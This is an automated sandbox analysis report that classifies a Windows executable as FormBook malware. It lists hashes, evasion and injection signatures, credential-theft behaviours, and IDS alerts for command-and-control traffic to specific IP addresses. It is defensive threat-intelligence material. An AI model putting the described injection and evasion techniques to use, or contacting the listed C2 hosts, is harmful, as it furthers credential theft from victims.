Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Pp7OXMFwqhXKx5Y.exe

Overview

General Information

Sample name:Pp7OXMFwqhXKx5Y.exe
Analysis ID:1567413
MD5:8a6f66334502bc3da28732ccd4353d14
SHA1:f51ecc0c41835d9aed80c16a8a7121ca08f9476a
SHA256:f6047e5b6850d495f6abb0be606099be170b94fcef640a52681490020a569bf6
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • Pp7OXMFwqhXKx5Y.exe (PID: 5384 cmdline: "C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe" MD5: 8A6F66334502BC3DA28732CCD4353D14)
    • Pp7OXMFwqhXKx5Y.exe (PID: 284 cmdline: "C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe" MD5: 8A6F66334502BC3DA28732CCD4353D14)
      • RAVCpl64.exe (PID: 7488 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • cacls.exe (PID: 4832 cmdline: "C:\Windows\SysWOW64\cacls.exe" MD5: 00BAAE10C69DAD58F169A3ED638D6C59)
          • firefox.exe (PID: 6088 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.179274577947.0000000005D30000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.182790212280.0000000003470000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.179229670326.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000004.00000002.182790291540.00000000034C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          Process Memory Space: Pp7OXMFwqhXKx5Y.exe PID: 5384JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.Pp7OXMFwqhXKx5Y.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.Pp7OXMFwqhXKx5Y.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-03T14:51:29.602451+010028554651A Network Trojan was detected192.168.11.2049759172.96.191.3980TCP
                2024-12-03T14:51:53.377169+010028554651A Network Trojan was detected192.168.11.2049763217.160.0.18380TCP
                2024-12-03T14:52:07.151640+010028554651A Network Trojan was detected192.168.11.204976784.32.84.3280TCP
                2024-12-03T14:52:20.725213+010028554651A Network Trojan was detected192.168.11.2049771209.74.79.4280TCP
                2024-12-03T14:52:34.872802+010028554651A Network Trojan was detected192.168.11.2049775208.91.197.2780TCP
                2024-12-03T14:52:49.119291+010028554651A Network Trojan was detected192.168.11.204977989.31.143.9080TCP
                2024-12-03T14:53:04.845268+010028554651A Network Trojan was detected192.168.11.20497838.136.96.10680TCP
                2024-12-03T14:53:19.147305+010028554651A Network Trojan was detected192.168.11.204978738.47.233.480TCP
                2024-12-03T14:53:32.806121+010028554651A Network Trojan was detected192.168.11.2049791103.224.182.24280TCP
                2024-12-03T14:53:54.362645+010028554651A Network Trojan was detected192.168.11.2049795172.67.201.4980TCP
                2024-12-03T14:54:07.869169+010028554651A Network Trojan was detected192.168.11.2049799173.0.157.18780TCP
                2024-12-03T14:54:21.142002+010028554651A Network Trojan was detected192.168.11.204980313.248.169.4880TCP
                2024-12-03T14:54:34.635788+010028554651A Network Trojan was detected192.168.11.2049807192.185.147.10080TCP
                2024-12-03T14:54:48.464695+010028554651A Network Trojan was detected192.168.11.2049811176.31.209.10780TCP
                2024-12-03T14:55:03.241493+010028554651A Network Trojan was detected192.168.11.204981545.197.47.17780TCP
                2024-12-03T14:55:12.635345+010028554651A Network Trojan was detected192.168.11.2049816172.96.191.3980TCP
                2024-12-03T14:55:26.191249+010028554651A Network Trojan was detected192.168.11.2049820217.160.0.18380TCP
                2024-12-03T14:55:39.823002+010028554651A Network Trojan was detected192.168.11.204982484.32.84.3280TCP
                2024-12-03T14:55:53.283542+010028554651A Network Trojan was detected192.168.11.2049828209.74.79.4280TCP
                2024-12-03T14:56:07.112706+010028554651A Network Trojan was detected192.168.11.2049832208.91.197.2780TCP
                2024-12-03T14:56:20.978871+010028554651A Network Trojan was detected192.168.11.204983689.31.143.9080TCP
                2024-12-03T14:56:35.326608+010028554651A Network Trojan was detected192.168.11.20498408.136.96.10680TCP
                2024-12-03T14:56:49.508113+010028554651A Network Trojan was detected192.168.11.204984438.47.233.480TCP
                2024-12-03T14:57:02.993916+010028554651A Network Trojan was detected192.168.11.2049848103.224.182.24280TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-03T14:50:18.814157+010028554641A Network Trojan was detected192.168.11.204982184.32.84.3280TCP
                2024-12-03T14:50:18.814157+010028554641A Network Trojan was detected192.168.11.204976684.32.84.3280TCP
                2024-12-03T14:50:18.814157+010028554641A Network Trojan was detected192.168.11.2049772208.91.197.2780TCP
                2024-12-03T14:50:18.814157+010028554641A Network Trojan was detected192.168.11.204976484.32.84.3280TCP
                2024-12-03T14:50:18.814157+010028554641A Network Trojan was detected192.168.11.204976584.32.84.3280TCP
                2024-12-03T14:50:18.814157+010028554641A Network Trojan was detected192.168.11.204980213.248.169.4880TCP
                2024-12-03T14:50:18.814157+010028554641A Network Trojan was detected192.168.11.204982284.32.84.3280TCP
                2024-12-03T14:50:18.814157+010028554641A Network Trojan was detected192.168.11.2049773208.91.197.2780TCP
                2024-12-03T14:50:18.814157+010028554641A Network Trojan was detected192.168.11.2049774208.91.197.2780TCP
                2024-12-03T14:50:18.814157+010028554641A Network Trojan was detected192.168.11.204982384.32.84.3280TCP
                2024-12-03T14:50:18.814157+010028554641A Network Trojan was detected192.168.11.2049830208.91.197.2780TCP
                2024-12-03T14:50:18.814157+010028554641A Network Trojan was detected192.168.11.2049829208.91.197.2780TCP
                2024-12-03T14:50:18.814157+010028554641A Network Trojan was detected192.168.11.2049831208.91.197.2780TCP
                2024-12-03T14:51:45.239026+010028554641A Network Trojan was detected192.168.11.2049760217.160.0.18380TCP
                2024-12-03T14:51:47.974097+010028554641A Network Trojan was detected192.168.11.2049761217.160.0.18380TCP
                2024-12-03T14:51:50.669133+010028554641A Network Trojan was detected192.168.11.2049762217.160.0.18380TCP
                2024-12-03T14:52:12.632134+010028554641A Network Trojan was detected192.168.11.2049768209.74.79.4280TCP
                2024-12-03T14:52:15.316664+010028554641A Network Trojan was detected192.168.11.2049769209.74.79.4280TCP
                2024-12-03T14:52:18.035833+010028554641A Network Trojan was detected192.168.11.2049770209.74.79.4280TCP
                2024-12-03T14:52:40.954663+010028554641A Network Trojan was detected192.168.11.204977689.31.143.9080TCP
                2024-12-03T14:52:43.683508+010028554641A Network Trojan was detected192.168.11.204977789.31.143.9080TCP
                2024-12-03T14:52:46.402837+010028554641A Network Trojan was detected192.168.11.204977889.31.143.9080TCP
                2024-12-03T14:52:56.160542+010028554641A Network Trojan was detected192.168.11.20497808.136.96.10680TCP
                2024-12-03T14:52:59.006807+010028554641A Network Trojan was detected192.168.11.20497818.136.96.10680TCP
                2024-12-03T14:53:01.899070+010028554641A Network Trojan was detected192.168.11.20497828.136.96.10680TCP
                2024-12-03T14:53:10.612514+010028554641A Network Trojan was detected192.168.11.204978438.47.233.480TCP
                2024-12-03T14:53:13.462096+010028554641A Network Trojan was detected192.168.11.204978538.47.233.480TCP
                2024-12-03T14:53:16.305207+010028554641A Network Trojan was detected192.168.11.204978638.47.233.480TCP
                2024-12-03T14:53:24.700544+010028554641A Network Trojan was detected192.168.11.2049788103.224.182.24280TCP
                2024-12-03T14:53:27.401782+010028554641A Network Trojan was detected192.168.11.2049789103.224.182.24280TCP
                2024-12-03T14:53:30.117901+010028554641A Network Trojan was detected192.168.11.2049790103.224.182.24280TCP
                2024-12-03T14:53:46.363729+010028554641A Network Trojan was detected192.168.11.2049792172.67.201.4980TCP
                2024-12-03T14:53:48.988647+010028554641A Network Trojan was detected192.168.11.2049793172.67.201.4980TCP
                2024-12-03T14:53:51.624752+010028554641A Network Trojan was detected192.168.11.2049794172.67.201.4980TCP
                2024-12-03T14:53:59.878230+010028554641A Network Trojan was detected192.168.11.2049796173.0.157.18780TCP
                2024-12-03T14:54:02.514484+010028554641A Network Trojan was detected192.168.11.2049797173.0.157.18780TCP
                2024-12-03T14:54:05.199744+010028554641A Network Trojan was detected192.168.11.2049798173.0.157.18780TCP
                2024-12-03T14:54:13.225774+010028554641A Network Trojan was detected192.168.11.204980013.248.169.4880TCP
                2024-12-03T14:54:15.860993+010028554641A Network Trojan was detected192.168.11.204980113.248.169.4880TCP
                2024-12-03T14:54:26.872473+010028554641A Network Trojan was detected192.168.11.2049804192.185.147.10080TCP
                2024-12-03T14:54:29.582363+010028554641A Network Trojan was detected192.168.11.2049805192.185.147.10080TCP
                2024-12-03T14:54:32.164731+010028554641A Network Trojan was detected192.168.11.2049806192.185.147.10080TCP
                2024-12-03T14:54:40.809851+010028554641A Network Trojan was detected192.168.11.2049808176.31.209.10780TCP
                2024-12-03T14:54:43.031819+010028554641A Network Trojan was detected192.168.11.2049809176.31.209.10780TCP
                2024-12-03T14:54:45.758627+010028554641A Network Trojan was detected192.168.11.2049810176.31.209.10780TCP
                2024-12-03T14:54:54.702361+010028554641A Network Trojan was detected192.168.11.204981245.197.47.17780TCP
                2024-12-03T14:54:57.557088+010028554641A Network Trojan was detected192.168.11.204981345.197.47.17780TCP
                2024-12-03T14:55:00.395570+010028554641A Network Trojan was detected192.168.11.204981445.197.47.17780TCP
                2024-12-03T14:55:18.049773+010028554641A Network Trojan was detected192.168.11.2049817217.160.0.18380TCP
                2024-12-03T14:55:20.759489+010028554641A Network Trojan was detected192.168.11.2049818217.160.0.18380TCP
                2024-12-03T14:55:23.500208+010028554641A Network Trojan was detected192.168.11.2049819217.160.0.18380TCP
                2024-12-03T14:55:45.177141+010028554641A Network Trojan was detected192.168.11.2049825209.74.79.4280TCP
                2024-12-03T14:55:47.878778+010028554641A Network Trojan was detected192.168.11.2049826209.74.79.4280TCP
                2024-12-03T14:55:50.586735+010028554641A Network Trojan was detected192.168.11.2049827209.74.79.4280TCP
                2024-12-03T14:56:12.795428+010028554641A Network Trojan was detected192.168.11.204983389.31.143.9080TCP
                2024-12-03T14:56:15.527591+010028554641A Network Trojan was detected192.168.11.204983489.31.143.9080TCP
                2024-12-03T14:56:18.262666+010028554641A Network Trojan was detected192.168.11.204983589.31.143.9080TCP
                2024-12-03T14:56:26.752606+010028554641A Network Trojan was detected192.168.11.20498378.136.96.10680TCP
                2024-12-03T14:56:30.246380+010028554641A Network Trojan was detected192.168.11.20498388.136.96.10680TCP
                2024-12-03T14:56:32.490783+010028554641A Network Trojan was detected192.168.11.20498398.136.96.10680TCP
                2024-12-03T14:56:40.981355+010028554641A Network Trojan was detected192.168.11.204984138.47.233.480TCP
                2024-12-03T14:56:43.821642+010028554641A Network Trojan was detected192.168.11.204984238.47.233.480TCP
                2024-12-03T14:56:46.666769+010028554641A Network Trojan was detected192.168.11.204984338.47.233.480TCP
                2024-12-03T14:56:54.891535+010028554641A Network Trojan was detected192.168.11.2049845103.224.182.24280TCP
                2024-12-03T14:56:57.592625+010028554641A Network Trojan was detected192.168.11.2049846103.224.182.24280TCP
                2024-12-03T14:57:00.284482+010028554641A Network Trojan was detected192.168.11.2049847103.224.182.24280TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: Pp7OXMFwqhXKx5Y.exeReversingLabs: Detection: 44%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.Pp7OXMFwqhXKx5Y.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Pp7OXMFwqhXKx5Y.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.179274577947.0000000005D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.182790212280.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.179229670326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.182790291540.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Machine Learning detection for sample
                Source: Pp7OXMFwqhXKx5Y.exeJoe Sandbox ML: detected
                Source: Pp7OXMFwqhXKx5Y.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Pp7OXMFwqhXKx5Y.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cacls.pdbGCTL source: Pp7OXMFwqhXKx5Y.exe, 00000002.00000002.179230808356.0000000001008000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cacls.pdb source: Pp7OXMFwqhXKx5Y.exe, 00000002.00000002.179230808356.0000000001008000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: Pp7OXMFwqhXKx5Y.exe, 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000004.00000003.179230035520.00000000033BE000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000004.00000003.179233863285.0000000003566000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Pp7OXMFwqhXKx5Y.exe, Pp7OXMFwqhXKx5Y.exe, 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, cacls.exe, 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000004.00000003.179230035520.00000000033BE000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000004.00000003.179233863285.0000000003566000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4x nop then mov ebx, 00000004h3_2_035074BF
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4x nop then mov ebx, 00000004h3_2_03DB8E4F
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4x nop then mov ebx, 00000004h4_2_035C04BF

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49771 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49767 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49770 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49762 -> 217.160.0.183:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49780 -> 8.136.96.106:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49787 -> 38.47.233.4:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49803 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49778 -> 89.31.143.90:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49791 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49800 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49760 -> 217.160.0.183:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49785 -> 38.47.233.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49761 -> 217.160.0.183:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49790 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49759 -> 172.96.191.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49819 -> 217.160.0.183:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49804 -> 192.185.147.100:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49775 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49799 -> 173.0.157.187:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49828 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49763 -> 217.160.0.183:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49844 -> 38.47.233.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49806 -> 192.185.147.100:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49816 -> 172.96.191.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49827 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49825 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49768 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49792 -> 172.67.201.49:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49781 -> 8.136.96.106:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49777 -> 89.31.143.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49812 -> 45.197.47.177:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49795 -> 172.67.201.49:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49769 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49789 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49836 -> 89.31.143.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49833 -> 89.31.143.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49826 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49776 -> 89.31.143.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49801 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49788 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49846 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49845 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49784 -> 38.47.233.4:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49811 -> 176.31.209.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49837 -> 8.136.96.106:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49805 -> 192.185.147.100:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49782 -> 8.136.96.106:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49810 -> 176.31.209.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49809 -> 176.31.209.107:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49807 -> 192.185.147.100:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49847 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49783 -> 8.136.96.106:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49786 -> 38.47.233.4:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49815 -> 45.197.47.177:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49835 -> 89.31.143.90:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49779 -> 89.31.143.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49793 -> 172.67.201.49:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49824 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49840 -> 8.136.96.106:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49813 -> 45.197.47.177:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49796 -> 173.0.157.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49797 -> 173.0.157.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49794 -> 172.67.201.49:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49841 -> 38.47.233.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49818 -> 217.160.0.183:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49834 -> 89.31.143.90:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49832 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49842 -> 38.47.233.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49843 -> 38.47.233.4:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49848 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49814 -> 45.197.47.177:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49838 -> 8.136.96.106:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49798 -> 173.0.157.187:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49820 -> 217.160.0.183:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49808 -> 176.31.209.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49839 -> 8.136.96.106:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49817 -> 217.160.0.183:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49821 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49766 -> 84.32.84.32:80
